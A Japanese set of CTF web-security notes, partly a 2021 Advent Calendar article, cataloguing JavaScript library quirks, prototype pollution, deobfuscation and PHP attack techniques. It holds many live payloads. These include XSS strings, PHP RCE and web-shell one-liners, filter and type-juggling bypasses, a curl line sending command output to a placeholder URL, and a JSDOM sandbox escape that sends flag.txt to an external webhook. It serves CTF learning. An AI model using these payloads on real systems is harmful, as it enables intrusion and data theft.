    - constructor[prototype][v-bind:class]=''.constructor.constructor('alert(1337)')()
  - GitHub - BlackFan/client-side-prototype-pollution: Prototype Pollution and useful Script Gadgets
    - ここにも色々ある
- jqueryでのGadget例
  - CTFtime.org / VolgaCTF 2021 Qualifier / Online Wallet (Part 2)
    - Object.prototype.div=['1','<img src onerror=alert(1)>','1']が達成できれば$('<div x="x"></div>')が含まれる部分で発火する
- Squirrellyのgadget
  - InCTF 2021 writeup - st98 の日記帳 - コピー
  - GHSL-2021-023: Remote code execution in squirrelly - CVE-2021-32819 | GitHub Security Lab
- Prototype Pollution in Kibana
- posixさんの記事にあるプロトタイプ汚染からのRCE
  - Handlebars + flat: flatライブラリでunflattenが使われていたらバージョンによってはプロトタイプ汚染が発生する
  - HTB x UNI CTF 2020 | N0xi0us
  - Cyber Apocalypse CTF 2021 Writeup | y011d4.log
発生契機
- jsonを受け取ってclone関数でオブジェクトを作る
  - maze [InterKosenCTF 2020] - HackMD
  - clone系の関数があると怪しいらしい
- ojb[a][b] = c;で、a,b,cのどれも外部入力可能
- 適当なDeepCopyとかDeepMerge関数
  - 再帰的に入れ込んでいれば怪しい ctf/2021/dice_ctf/build_a_better_panel at master · qxxxb/ctf · GitHub
テク
- protoを使えないようにフィルタリングしている場合は別の表記でバイパスする
  - constructor.prototypeでもOKなので、['constructor']['prototype']みたいにすると['proto']と同等
- VolgaCTF 2021 Qualifier - Online Wallet (Part 2) · Issue #27 · aszx87410/ctf-writeups · GitHub
  - obj=Object.create(null)として修正していて大丈夫じゃんとなっても、配列を与えるとできる例
    - ?a[0][]=1&a[0][__proto__][abc]=1 -> [].abc==='1'
    - ?a[0][]=1&a[0][__proto__][__proto__][b]=1 -> Object.prototype.b='1'
defineSetterを汚染する
- __defineSetter__を汚染することで、代入時に発動する攻撃を仕掛けることもできる。exploit.py
問題
- 存在しないプロパティを埋め込む
  - WeCTF 2020
- __defineSetter__を汚染する
  - CTFtime.org / TSG CTF 2020 / Beginner's web
参考

ライブラリとかフレームワークとか

node-mysql-native
- JSのMySQLライブラリ
- connection.query('SELECT * FROM users WHERE id = ?', [id]のidに何が入ってるとどうなるか
  - mysqljs/mysql: A pure node.js JavaScript Client implementing the MySQL protocol.に書いてある
  - 使えそうなのは連想配列を入れると、key = 'val'として出力される
- 攻撃例
  - const sql = 'Select * from users where username = ? and password = ?';でcon.query(sql, [u, p], function(err, qResult) {となってる
  - これでusername=michelle&password[password]=1とすると、SELECT * FROM users WHERE username='michelle' AND password=`password`='1'となる
  - password=`password`='1'これが恒真らしい、なぜだ…
dotenv
- node.js向けの環境変数を扱うライブラリ。
- ディレクトリトラバーサル脆弱性があれば、どこかのapp/.envを見ることで環境変数を抜ける。これ
Angular
- URLで\をスラッシュとして使用可能。パーセントエンコーディングはデコードされる。
- SSRF
  - Angularでthis.http.get('/api/answer')のようにリクエストを飛ばしている箇所があれば、PROTOCOL + HOST + / PATHでアクセスする
  - なので、HostにCNAMEで127.0.0.1/api/true-answerを指すようにしたドメインを指定すれば、https://127.0.0.1/api/true-answer/api/answerのようにSSRFできる
  - 適当なサイトに誘導してリダイレクトで127.0.0.1/api/true-answerへ飛ばせば、SSRFを達成できる。
- TokyoWesterns CTF 2020 | writeups by @terjanq
  - AngularのSecondary segments - Angular Routerという機能を使ってバイパスする
  - これを使うだけ http://another-universe.chal.ctf.westerns.tokyo/(primary:debug/answer).
  - primaryを使うのみがミソっぽい
- ペイロード
Inspector
- nodejsのbuilt-inライブラリ。バックで動いているV8エンジンに直接命令を下せる
- ライブラリ自体：Inspector | Node.js v14.13.1 Documentation
- 命令の内容：Chrome DevTools Protocol - version v8 - Runtime domain
- privateプロパティが覗ける SECCON 2020 Online CTF - Capsule & Beginner’s Capsule - Author’s Writeup - HackMD
v8ライブラリ
- ヒープが抜き出せる
- const v8 = require('v8'); const memory = v8.getHeapSnapshot().read(); console.log(memory.toString());
- これだけ。この問題では量が多いので、sliceで抜き出して答えている
Lodash
- 4.17.4にはプロトタイプ汚染の脆弱性がある
hbs
- テンプレートエンジンであるhandlebars.jsをexpressから使えるようにしたもの
- The Secret Parameter, LFR, and Potential RCE in NodeJS Apps
  - LFR (:Local File Read)ができる
  - router.post('/', function(req, res, next) { res.render('index', req.body.profile) });みたいに呼び出すときに
  - curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{"layout\": \"./../routes/index.js\"}}' 'http://[attackhost]/'とすると、./../routes/index.jsを出力してくれる
  - 修正: res.render('index', { profile })のように直下におかないようにするのがいいみたい
- 4.0.3以下ならHandlebars.jsでRCE脆弱性がある Handlebars template injection and RCE in a Shopify app
jpv
- A vulnerability in validate() · Issue #6 · manvel-khnkoyan/jpv · GitHub
  - 変数名をconstructor.nameを追加でつけることによって偽装できる
querystring
- expressのPOSTでbodyからquerystringを受け取ってconst { p } = querystring.parse(body)みたいにパースしているとき
  - curl http://34.84.5.211/ -d 'p=1&p=%ff/ＮＮ/ＮＮ/ＮＮ/flag' -H 'Content-Type: text/plain'
  - こんな感じにＮを使うことで.を表現できる
axios
- axios 0.21.0
  - SSRFできる Requests that follow a redirect are not passing via the proxy · Issue #3369 · axios/axios · GitHub
    - 参照先からリダイレクトさせるとプロキシを通さない（アクセス制限しててもbypass可能）
    - 単純に以下のようにして、ここにアクセスさせるとhttp://127.0.0.1/adminにリダイレクトするが、これはproxyを通さず表示可能 js const http = require('http') http.createServer(function (req, res) { res.writeHead(302, {location: 'http://127.0.0.1/admin'}) res.end() }).listen(5566)
Mermaid
- #1106238 Stored XSS via Mermaid Prototype Pollution vulnerability
- #1103258 Stored DOM XSS via Mermaid chart
JSDOM
- DOMをjsで作るもの（よくわかってない）
- ここで作成されたDOMでonclickとかが呼ばれた場合はサーバ側のDOMとして動作するので、サーバ側でRCEができる感じになる
- ただ、サンドボックス上で評価されるので工夫が必要であるが、vmモジュールを使ったサンドボックスなので、既知の脱獄手順を使ってホスト上でRCEしよう
- corCTF2021の課題•ブライスのブログ
  - <button class="next" onclick="const ForeignFunction = this.constructor.constructor;const process = ForeignFunction('return process')(); const require = process.mainModule.require; require('http').get('http://webhook.x.pipedream.net/?q=' + require('fs').readFileSync('flag.txt'));">next</button>
DOMPurify: JS向けサニタイズライブラリの定番。結構強いから、基本的には抜けない。
- 脆弱性
  - Write-up of DOMPurify 2.0.0 bypass using mutation XSS - research.securitum.com
    - <svg></p><style><a id="</style><img src=1 onerror=alert(1)>">で攻撃可能
Express
- app.use(bodyParser.urlencoded({ extended: true }))
  - これがあるとGETパラメターに配列、連想配列を指定することができる
  - x[]=a&x[]=bだとx=['a','b']
  - x[a]=1&x[b]=2だとx=[a: '1',b: '2']
- ルーティングの文字は大文字小文字区別しないのでrouter.get('/flag', (req, res) => {とあったら/FLAGでもアクセス可能
- リクエストがどうなったら終わるか
  - return res.status(400).send('deploymentId required!').end();のようにendがついてたら終わる
  - return res.status(402).set('X-Billing-Account', account);のようにendが無くて、nextがあれば、nextへ遷移する（！！）
React
- CTFtime.org / redpwnCTF 2021 / MdBin
  - PrototypePollution経由でXSS成功させている？

jQuery

danger
- userinputがそのまま出力されるケース
  - $("#element").html([input]);
  - $("#element").append([input]);
- v1.6.2以前
  - $(location.hash)として#<img>を与えるとimgタグが作られる
safe
- $btnFacebook = $('<div />', {"data-href" : "[input]"})のように辞書形式でpropertyを指定すればhtml化されてもうまいことエスケープされる
- $("#X").text([input]);
jQueryのgetJSONはcallback=?がURLに含まれる場合にはJSONPとして解釈する
- this.contest = await $.getJSON(`/${location.hash.slice(1)}.json`)みたいになっていたら#/example.com/aで外部の//example/a.jsonを見に行ってくれる
- この場合に/example.com/a.js?callback=?&とすればjsを実行してくれる

TypeScript

TypeScript: TS Playground - An online editor for exploring TypeScript and JavaScript
- ここでTS実行とか、jsにトランスパイルしたらどうなるかとか気軽に見れる
hard-privateの中身をトランスパイル後に見る方法
- Beginner's Capsule [SECCON 2020 Online CTF] - はまやんはまやんはまやん
- var __classPrivateFieldGet = function (receiver, privateMap) { return privateMap.get(receiver); };を定義して、
- console.log(eval('__classPrivateFieldGet([インスタンス変数], [private名の#を_にしたもの])'));
- beginners-capsule.js これで丸ごと持ってこれる

JavaScript難読化

Javascript Obfuscator
- javascript-obfuscator/javascript-obfuscator: A powerful obfuscator for JavaScript and Node.js
- よく見るし、業界標準？（業界人でないので分からないが、資料はたくさん出てくる）
- リソースを出力する謎関数を作成する。
  - 手作業で分解するのはだいぶつらいので、Chromeのデベロッパーツールでブレークして、使われている_0x2384('0x3')みたいなやつの中身を見ていくのがオススメ。
- 0x3936 のような特徴的な識別子、debugger 文による解析妨害、0x487fdb(0xd9, 'og)h') のようによくわからない関数を呼び出して文字列等を取り出しているといった特徴がある。
JSFuck
- []+[+[[][]]]みたいなやつはJSFuckという難読化形式。
- https://enkhee-osiris.github.io/Decoder-JSFuck/ で解除可能。
うーにゃー
- (」・ω・)」うー!(/・ω・)/にゃー!encode
  - kusanoさん作
- デコード方法
  - ksnctf #3 Crawling Chaos - Qiita
    - console.logでくるんで実行してデコードする
  - 【(」・ω・)」うー!(/・ω・)/にゃー!】 ksnctfのCrawling Chaosを解いてみた | WEB EGG
    - jsファイルにしてnodeで実行する
  - うまくいけば抜き出せる
難読化解除テク（と言ってもほぼ根性）
- フォーマッタ DirtyMarkup Beautifier - Javascript Formatter, JS Tidy Up
  - 体裁を整えたりしてくれる
Chromeのローカルオーバーライド
- これを使うと、ページを再読み込みしても修正されたjsなどを実行できる。
  1. やりたいサイトでデベロッパーツールを開く
  2. SourceパネルのOverridesタブを開く、適当なフォルダを指定する（どこでもいい）
  3. Pageタブを開き、修正をローカルで永続化しておきたいファイルを右クリックして、Save for overridesを選択する
  4. これでオーバーライドできたので、適当に修正して、実行する
- javascriptであれば、オーバーライド後に、Networkパネルから目的のjsファイルを選択して、Previewタブを開くと、ちょっときれいになったjsが得られるので、それを持ってきて、オーバーライドしたところで上書きするとちょっと幸せになる。console.log(見たい変数);でバンバン入れて、中身を見ていこう。
何を探すか
- jsだと暗号化とかも自前でやってるから、encryptとかdecryptとかのキーワードで探してみると何か出てくるかも
- どこかで外部からデータを持ってきているなら、SQLiができるかもしれない
  - httpとかで検索したら良い感じのURL出てくるかも
参考
- JavaScript難読化読経
  - Chrome Developer Toolsでのステップ実行が書いてある。便利。
- 難読化されたJavaScriptコードを読む : document
  - IDEアシストを使う方法が書いてある
  - やったことないけど、静的解析で使ってないやつを消すとか、機械的にやれることはまだまだありそう（自動化余地あり）
debugger文を使った解析妨害コード
- Securinets CTF Quals 2021 の writeup - st98 の日記帳
  - とりあえずDeactivate breakpointsで妨害は阻止できる（でもデバッグできない）
  - 解析妨害を潰していきましょう。Deactivate breakpoints を切って debugger が実行された際の Call Stack を確認すると、index.html の 1029 行目からこの関数が呼び出されていることがわかります。
  - javascript-obfuscator/DebuggerTemplate.ts at 252b901b6954ba91cb1a82fa8a7b048e5ebbffeb · javascript-obfuscator/javascript-obfuscator · GitHubのような妨害コードと似ているところを探して、全部削除する
- Chrome Developer Toolsがsource codeをbeautifyする前に（もしくは、している間に）ブレークさせる
  1. Chrome Developer Toolsを開く（解析妨害コードでブレークする）
  2. ブレークしている状態で本当にブレークさせたい所にブレークポイントを置く
  3. 一旦閉じる
  4. Chrome Defveloper Toolsを開くと同時に、ブレークさせたい所が発動するようなアクションをする（例えばボタンを押す）
  5. すると、解析妨害コードよりも先に手順4のアクションが優先され、ブレークさせたい所でブレークさせることができる

2021-12-18

CTFのWebセキュリティにおけるPHPまとめ

Security

この記事はCTFのWebセキュリティ Advent Calendar 2021の17日目の記事です。

Webサーバのフロントエンド（最近はそうでもないか）、バックエンドとして普及しているPHPにはセキュリティ的課題が多い。

<?php eval($_POST['cmd']); ?>となりうるコードがあると危険
- eval("echo ".eval("return ".$_GET["calc"].";").";"); CTFtime.org / TetCTF 2021 / Super Calc
  - 象徴的なコードreturnしたらevalの戻り値になって、それをechoしている例
ワンライナー一覧
- RCE passthru("cat /f*") system("ls -la ./"); <?='cat /flag'; <?=`$_GET[0]`; ?> <?php system($_GET["c"]); ?>
- ls foreach(new DirectoryIterator('glob:///*') as $f){ echo $f."\n"; } print_r(scandir('./')); var_dump(scandir("/var/www/html")); scandir(__dir__) opendir() readdir()
- cat readfile(glob('*')[0]); eval(system('cat / flag')); show_source('./flag.txt');
  - 試してない file_get_contents('f1@g.txt')
  - base64で出したい var_dump(base64_encode(readfile("../../../flag.so")));
  - includeで引っ張れたりもする include '/etc/f1@g.txt';
  - $process = proc_open('/flag_x', array(1=>array("pipe","w")), $pipes); echo stream_get_contents($pipes[1]);
- 定義済み配列をすべて出す print_r(get_defined_vars())
- ブラインドRCE $output=shell_exec(\"ls\");shell_exec(\"curl -XPOST -d'data=$output' [url]"\"); ここ
phpファイルを動かすには
- XX.phpをアップロードする（.phpじゃない拡張子でやりたい場合は、.htaccessを書き換える）
  - DarkCON ctf web writeup - VKL_SQL
    - AddType application/x-httpd-php .shell
    - php_value zend.multibyte 1
    - php_value zend.detect_unicode 1
    - php_value display_errors 1
- <?php ... ?>や<?=...?>を作る
- 実は色んな拡張子が使える .php .php3 .php4 .php5 .phtml
- .htaccessによって実行できないようにしているかも
  - Disable PHP in a directory with Apache .htaccess | The Electric Toolbox Blog
  - 以下のような記載があれば、（どれかがあれば、）実行を防げる RemoveHandler .php .phtml .php3 RemoveType .php .phtml .php3 php_flag engine off
artyuum/Simple-PHP-Web-Shell: Tiny PHP Web shell for executing unix commands from web page
- 便利なWebShell
xorを使ったバイパス方法がある
- eval("echo ".eval("return ".$_GET["calc"].";").";");
  - こういう感じで1回実行されて、さらに実行されれば使える
  - '^()が使えれば大体は作れる
- ('??????'^'??????'^'??????')のように3つの文字列のxorで大体作れそう
  - pythonで全探索
- CTF-Writeup/README.md at main · vichhika/CTF-Writeup
  - 良い感じのジェネレータを公開してくれてる
4*4とか入れて16とか出てきたらプログラムとして解釈されている恐れがある
- 試しにsystem(ls)とかを入れてみて、動くか見てみる
source
- User-Agentから
  - CTF-Writeups/HPNY.md at master · hrca-writeups/CTF-Writeups · GitHub
    - User-Agent: */ eval(system('[payload]')) /*
    - (eval(implode(getallheaders())))()
    - こうやると、先頭末尾部分はコメントアウトされて、任意のコードが実行可能
画像ファイルのヘッダーを見てアップロード可能かを決めてる場合にヘッダーだけ付け替えてバイパスする
- JPEG: GitHub - jgor/php-jpeg-shell: Simple PHP webshell with a JPEG header to bypass weak image verification checks
- GIF: Hiding Webshell Backdoor Code in Image Files | Trustwave | SpiderLabs | Trustwave
- PNG: Encoding Web Shells in PNG IDAT chunks | Application Security
eval("echo 'Hello ".$a."<br>$flag';");で実行する
- ',system('id'),'でidで普通に実行できる
- ',('system')('id'),'こうしてもidが実行可能 ',('system')('id'+),'
- 他ペイロード
  - ',('system')('ls+/'+),'
  - ',('system')('od+/*'+),'
限られた文字でPHPコード実行をする
- st98さんがプロすぎる
- BSides Noida CTF 2021 writeup - st98 の日記帳 - コピー
  - implode('',[chr(97),chr(98),chr(99)]) みたいな感じでフィルターを回避しつつ任意の文字列が作れるので、('passthru')('ls -la') みたいな感じでコマンドを実行する。
- [Bypass WAF] Php webshell without numbers and letters • Penetration Testing
- [PHP-CTF] No letter without digital webshell - Programmer Sought
- RCTF 2020 の write-up - st98 の日記帳
- Securinets CTF Quals 2021 の writeup - st98 の日記帳
LFI: Local File Injection
- 例えば?page=homeとか?page=ab.phpとかなっていれば、LFIが使える場合がある
- PHP的には12($_GET['page']);のような感じになっている
- LFIの詳細については、別途ページで記載予定。簡単に今は書いておく
  - ローカルアドレスも行けるが、URLも受け付ける
    - php プロトコル：php://filter/convert.base64-encode/resource=index.phpいつものこれ
    - httpプロトコル：普通に外部のphpファイルを埋め込める
include先でechoしているものはechoされた後のコードで得られる
- echo $_GET['a']; include($_GET['b']);というindex.phpがあるとする。
- /index.php?b=http://localhost/index.php/?a=%3C?system(%22ls%22);?%3EでRCE成立
Unsafe Deserialization
- 外部からデシリアライズするデータを渡せるとき、意図しないクラスの意図しない状態のインスタンスを生成するテク徳丸さん記事 OWASP
- 細かくは別途ページで記載予定。
- オブジェクトの変数（プロパティ）をインジェクションできる
  - デシリアライズ時に__constructは呼ばれない
  - だが、__destructや特殊な関数は呼ばれる可能性があり、そこでインジェクションしておいた変数の値を使って、いろんなことを行うここに網羅されてる
    - とりあえず__wakeup()と__destruct()が呼ばれる
- Remote code execution through unsafe unserialize in PHP
  - PHPでも、Gadget chainがある
- シリアライズされたものに含めることができるのは変数だけ。変数を入れこむ感じでシリアライズする。
- protectedの変数の場合は変数名に特殊文字が入り込むので、シリアライズ化するときはurlencodeして取り出したほうが、おかしくなりにくい
XXE
- simplexml_load_string関数
SQL Injection
- かならずプリペアードステートメントを使う事
- 入力のサニタイズに使用されている所を言語仕様を使ってバイパスしたりする
PHP Type Juggling
- PHPの比較は弱いことが知られている
- !strcasecmp($_POST['flag'], $flag), strcmp($_POST['password'], $password) == 0
  - 実はバイパス可能
  - $_POST['flag'] = []となるようにPOSTで与えてやれば、全体をtrueにすることができる
  - 配列を渡すにはflag%5B%5D=こんな感じにすればいい（flag[]=のURLエンコーディング後）
  - htmlでは<input type="hidden" name="flag[]" value=""/>こんな感じ
- '1234a' == 1234は真となる
  - でもis_numeric('1234a')はしっかりfalseなので、is_numericのバイパスに使える
  - "1abc" == "0abc" + 1も真（！）ここ
- magic hash
  - '0e????' = '0'が成り立つ。左辺はMD5ハッシュで出てくる可能性があるので、ハッシュを調整してこの状態を作る問題がある
    - ?には0-9が入る必要がある
  - この問題では、./flag.txt, .//flag.txt, .///flag.txtのようにスラッシュを増やしていっても問題ないことを利用してハッシュを変えて全探索していた
    - 881回スラッシュで出てきた
  - magic hash一覧 https://github.com/spaze/hashes
    - MD5 QNKCDZO 240610708
    - SHA256 34250003024812 aaroZmOk 0e9682187459792981
- 0は0も00も.0も
parse_url関数
- バージョンによってはhttp://websec.fr/level25/index.php?page=main&send=%E9%80%81%E4%BF%A1&a=1:2が失敗する
- :が値に入っていると失敗する。失敗すると、戻り値がnullになる
$_SERVER['PHP_SELF']とbasename関数
- Injection可能 $_SERVER['PHP_SELF']は危険？ - [PHP + PHP] ぺんたん info
- basename関数は、localeを適切に設定しないと、マルチバイト文字を無視する仕様になっている
  - より具体的には\x80-\xffを無視する？
- 以下実験メモ
  - http://localhost/index.php/config.php
    - $_SERVER['PHP_SELF'] = /index.php/config.php
    - basename($_SERVER['PHP_SELF']) = config.php
  - http://localhost/index.php/config.php/a
    - $_SERVER['PHP_SELF'] = /index.php/config.php/a
    - basename($_SERVER['PHP_SELF']) = a
  - http://localhost/index.php/config.php/あ?source ※ %E3%81%82 = あ
    - $_SERVER['PHP_SELF'] = /index.php/config.php/あ
    - basename($_SERVER['PHP_SELF']) = config.php
$address = filter_var($address, FILTER_VALIDATE_EMAIL);でメールアドレスチェック
- ""@a.bとすると通る
- 例えば"'whoami'"@example.comとすると、whoamiが解釈されて"markus"@example.comとなったりする
- '||1#@i.iもvalid（SQLinjectionで成功する）
- RCEもある
  - "attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.coこんな感じ？ちょっと分からない
エラーについて
- エラーを出したいとき（未検証）
  - error_reporting(E_ALL); ini_set('error_reporting', E_ALL); ini_set('display_errors', '1');
- エラーを表示させない
  - ini_set("display_errors", 0);
GETリクエストの解釈違い
- ?username=abc&username=efgとなった場合
  - $_GET["username"] -> efg
  - new URL(location).searchParams.get("username") -> abc
PHPでリダイレクトをしたらdie,exitを呼び出しなさい
- Safely handling redirects with die() and exit() in PHP | Acunetix
- リダイレクト呼び出しをしても終了処理をしないと、後ろの部分は処理されて、場合によっては応答としてユーザーに渡されてしまう
- dieとexitのどっちがいいか？という話 PHP: Utilizing exit(); or die(); after header("Location: "); - Stack Overflow
  - どっちでもよさそうなので、正常系処理ならexit(0)としとけばいいんじゃないかな？
PHPのgetパラメタ配列化Attack
- CTFtime.org / Chujowy CTF 2020 / SHA256 Collision
  - https://web5.chujowyc.tf/?a[]=0&b[]=1で突破可能
  - $ha = hash("sha256", $_GET['a']); // $ha === null
  - $_GET['a'] !== $_GET['b']のように配列の===比較では中身までちゃんと見てくれる
.user.ini
- CGIモードで、ディレクトリ単位でPHPの設定をするときのINIファイル
ob_start関数
- バッファを一旦保持しておいて、決まったタイミングでflushする機構
- ob_startで保持されたバッファは、fatal errorが発生すれば強制的にflushされたりする
  - CTFtime.org / 3kCTF-2020 / xsser
  - この問題では、unserialize関数でO:11:"Traversable":0:{}を入れてfatal errorを起こしていた
    - Traversableクラスは抽象クラスなので、抽象クラスを作ろうとしてfatal errorが出てくる
is_numeric
- 数値の前に%09, %20,%0a,%0b,%0c,%0dが来てもtrueになる
- trueになるやつ 1e9
preg_replace関数/str_replace
- 1回しかreplaceしないので、selSELECTectみたいにすればバイパスされてしまう
- preg_replaceに任意入力できる場合はRCEの危険性がある
  - Command Execution | preg_replace() | RCE | Roshan Cheriyan | Medium | Medium
    - echo "replaced : ".preg_replace($_GET['pattern'], $_GET['replacement'], $_GET['subject']);となってる場合
    - index.php?pat=/a/e&rep=phpinfo();&sub=abcとやればphpinfo();が実行される
    - index.php?pat=/a/e&rep=system(‘id’);&sub=abc
      - 平たく言うとpreg_replace("/a/e", "system(‘id’);", "abc");となる
    - 緩和策も書いてある
md5関数の誤用
- "select * from Users where pw='" . md5(%ps, true) . "'"というリクエスト作成方法について
- md5の第二引数にtrueがあると、ハッシュ値をhex文字列ではなくバイナリで返してくれる
- バイナリなので、任意のascii文字列になるように原文を探して送れば、SQLiとかが可能 안경잡이개발자 :: [해킹 대회 문제] wargame.kr - md5 password 문제풀이(Write Up)
- 上の例だと'='が含まれればいい。3文字くらいなら即見つかるけど、7文字にしたら途端に見つからなくなった
$_SERVER['HTTP_X_FORWARDED_FOR']
- リクエストHTTPのヘッダーで外部から自由にインジェクション可能
- X-Forwarded-Forヘッダーで入れればいい
time()
- Unixタイムスタンプを返すので、類推可能
- 例えば、2020/11/18 20:54:21(JST)なら$time = (new DateTime('2020-11-18 20:54:21', new DateTimeZone('Asia/Tokyo')))->format('U');でUnixタイムスタンプが得られる
- ID推測とかで使用するときは、Burpに残ってる時間ピッタリだけでなく、周りの時間が使われている可能性も考えること（秒単位でクライアント・サーバが一致していないかも）
- CTFtime.org / SPbCTF's Student CTF 2020 Quals / eSick
  - この問題では、timeとuuidからファイル名を類推するが、timeがどれかが微妙にわからないので候補を全部作って、BurpのIntruderを使ってヒットするものがないか探す
mysqli_real_escape_string
- PHP: mysqli::real_escape_string - Manual
  - NUL (ASCII 0), \n, \r, \, ', ", および Control-Zがエスケープされる
バイパステク：他の入力を持ってくる
- 0xL4ughCTF-write-up. Hi , My name is Ahmed Magdy | by Ahmed Magdy | Jan, 2021 | Medium
  - ヘッダーから持ってくる
  - Flag: fl@g.phpを入れてshow_source(end(getallheaders()))
  - Flag: fl@g.phpを入れてshow_source(array_pop(getallheaders()))
攻撃コードに書いてあったコードについて
- error_reporting(0); エラーを出さない
- set_time_limit(0); 実行時間を無限にする
  - 設定は上書きされるっぽいので、設定でなんとかするのは難しそう
バッファを使い切ってHeader出力を抑制するテク
- Write-ups to justCTF [*] 2020 by @terjanq - HackMD
- PHPではheader出力の前に画面出力をしてはならないのだが、バッファ機能が有効である場合、画面出力のあとにheader出力をしてもバッファしてあれば差し込むことができる
- だが、header出力をして差し込む前に、バッファのサイズ上限まで出力されていた場合は容量不足で差し込むことができず、headerが消滅する
- このwriteupでは、それを利用してCSPヘッダーを差し込ませないようにしている
- バッファのサイズ上限まで出力させるには、エラーメッセージを用いている
$_SERVER
- REQUEST_URI
  - ページにアクセスするために指定されたURIを指すので、
  - GET http://localhost/test.php?query=value#fragment HTTP/1.1みたいにするとhttp://localhost/test.php?query=value#fragmentとなる
- HTTP_HOST
  - リクエストにHostヘッダーがあった場合にそれが入る。偽装可能
GET Parameterのkeyにdot,spaceを入れると、underscoreに自動変換される
- Insomni’Hack 2018 - PHuck | Tipi’Hack CTF team
- Winja CTF 2021 // Tom Plant
- 変数名として使えないから_に変換するということらしい…
  - 例えば?.=XXXみたいにするとstrpos($_SERVER['REQUEST_URI'],"_") === falseとなるけれど、$_GET["_"] === "XXX"となる
古いPHPだと結構ヌルバイト攻撃が有効っぽい（未確定）
PHPでトークン生成には単にCSPRING(暗号論的に安全な疑似乱数生成装置)を使うこと
- ハッシュ化するとか余計なことをすることで脆弱性が入り込みやすくなる
- PHP7以降ではrandom_bytes関数を使うだけ
- mt_rand関数を引数無しで呼ぶと、31ビットの範囲になるからエントロピーが不足する（128bits以上がデファクトスタンダード）
PHP assert() Vulnerable to Local File Inclusion – All things in moderation
- assert("strpos('$file', '..') === false") or die("Detected hacking attempt!"); // vulnerable code!
- assert("strpos('', 'qwer') === false && strlen(file_get_contents(“../../../../../etc/passwd”)) == 0 && strpos(‘1', '..') === false") or die("Detected hacking attempt!"); // vulnerable code!
  - $file = ', 'qwer') === false && strlen(file_get_contents(“../../../../../etc/passwd”)) == 0 && strpos(‘1をやった結果
- NahamCon CTF 2021 - Capture The Flag (CTF)
  - assert("strpos('$file', '..') === false") or die("HACKING DETECTED! PLEASE STOP THE HACKING PRETTY PLEASE");に' .system("id"). 'を入れる
.phpsはPHPのソースコードファイルとして使える拡張子
- <FilesMatch "\.phps$">SetHandler application/x-httpd-php-source</FilesMatch>
- PHPを利用するためのApacheの設定 | XAMPPの使い方
open_basedirのバイパス手法
- PHP Open_basedir bypass | shpik’s world
new finfo(1, '.');とやればとあるディレクトリ下のファイルを無理やり読み込ませて、エラー情報から内容を得ることができる
- Securinets CTF Quals 2021 の writeup - st98 の日記帳
- finfo __constructでmagic_fileというオプションがmagic database fileを取得するために、特定のディレクトリにあるすべてのファイルを解析してくるようだ。ここmagic_fileオプション別のパスを与えると解析してくるファイルのフォーマットが合わず、警告を使用してファイルの内容を出力してくれるようだ。ちなみにfinfo classはfinfo関数のオブジェクト
  - まあ実行すると、全部解析してくれて、フォーマットが合わないから警告が出るけど、そこに情報が出ちゃうからファイルパスが抜けるんだろう
$_REQUESTは$_GET,$_POST,$_COOKIEの内容をまとめた連想配列
- こういういろんな所からデータ取れるものは意図せずデータインジェクションが発生しうるので使うのはやめといたほうがいい
idn_to_ascii
- punycodeへの変換関数であるが、これを使うと／が/になり、これが脆弱性につながる場合もある
  - SECCON 2019 Online CTF write-up - Qiita
  - https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization-wp.pdf
create_function関数
- nkzlxs_ctf_writeups/shakticon2021/web at master · Nkzlxs/nkzlxs_ctf_writeups · GitHub
  - }printf("printed some stuff!");function a(){で刺さる
- PHP 5.2.6 - 'create_function()' Code Injection (2) - PHP remote Exploit
  - $unused = create_function('','return -1 * var_dump($a[""]);}phpinfo();/*"]');みたいに第二引数に指定のルールで入れると発動
mail関数を使ったbypassテク
- PHPのbypass disable_functionsについて (Chankro使ってみた) - 過密です
glob関数は先頭がドットのファイルは取ってこないので、foreach (glob("temp/$dname/*") as $file) { @unlink($file); }こういうので削除を回避できる
@rmdir("temp/$dname");は中身に何か残ってたら失敗する
@move_uploaded_file関数は引数のパスが長いと失敗する。300文字くらいで失敗するらしい
FFIについて
- PHPからdllファイルを読み込んで実行できる機構
- $ffi = FFI::load('/flag.h'); ⇒ $a = $ffi->flag_fUn3t1on_fFi(); ⇒ var_dump(FFI::string($a));みたいな感じ
- メモリ抜き出しも行える
- FFIでRCEしたいとき(PHP 7.4.X以下ならFFIを経由することでdisable_functionsをbypassできる) <?php $ffi=FFI::cdef("int system(const char *command);"); $ffi->system('ls'); ?>
OPcache
- PHPのキャッシュ機構
- 攻撃手法
  1. phpinfoを見て、opcacheが有効か確認
  2. opcache.file_cache = /var/www/cache/ならば/var/www/cache/[system_id]/var/www/html/flag.php.binを探せばいい。
  3. これのsystem_id_scraper.pyを使ってsystem_idを抜き出す python ./system_id_scraper.py http://carthagods.3k.ctf.to:8039/info.php
- CTFtime.org / 3kCTF-2020 / carthagods
Phar, PHPアーカイブ
- Exploiting PHP Deserialization: CCCamp19 CTF PDFCreator Challenge
- PHP: はじめに - Manual
  - 仕様的にRCEが達成できそうな雰囲気はある
- Exploiting PHP Phar Deserialization Vulnerabilities: Part 1 | Keysight Blogs
- CTFtime.org / Tenable CTF 2021 / Phar out

phpinfo

見方
- System: OSがWindowsかLinuxか
- Registered PHP Streams, Registered Stream Filters: 使えるストリームが分かる（php://とか）
- extension_dir: php拡張モジュールのパス（いつ使う？）
- short_open_tag: <?=,<? echo,<? ?>が使えるかどうか
- disable_functions: 使えない関数が列挙されている
- disable_classes: 使えないクラスが列挙されている
  - これをもとに使える関数・クラスを得たい場合は手元で全部使える状態で使えるやつを抜き出してdiffを見ればいい ```php <?php function get_diff($a, $b) { $a = file_get_contents($a); $a = str_replace(' ', '', $a); $a = explode(',', $a);
    
    return implode(', ', array_diff($b, $a)) . "\n"; }
  echo "functions: " . get_diff('disable_functions.txt', get_defined_functions()['internal']); echo "classes: " . get_diff('disable_classes.txt', get_declared_classes()); ```
- open_basedir
  - ここにフォルダパスが書かれている場合は、ファイルオープンはこのパス以下じゃないとダメ。
  - でも、DirectoryIteratorを使えば任意の場所のlsができる。
  - FFI::loadもこれの影響を受けない。
- SERVER_ADDR: サーバのIPアドレス
- DOCUMENT_ROOT: ルートディレクトリ
  - linuxなら/var/www/htmlが普通？
- session: セッションの設定が見られる（todo: 観点は？）
  - セッションが保存されている場所や使用可能な場所を確認することができる
- gopher: これがあればSSRFできるかも
- fastcgiが有効になってればRCEとかできたりする（todo: どうやって確認？）
- allow_url_include: 有効ならLFIできる？（よくわかってない）
